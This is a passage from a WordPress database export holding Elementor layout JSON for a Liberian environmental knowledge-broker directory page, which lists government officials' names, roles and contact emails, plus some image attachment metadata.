questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23077,3334,'_wp_attached_file','2021/01/edward.png'),(23078,3334,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2021/01/edward.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"edward-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"edward-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23085,3336,'_elementor_edit_mode','builder'),(23086,3336,'_elementor_template_type','wp-page'),(23087,3336,'_elementor_version','3.0.16'),(23088,3336,'_wp_page_template','default');
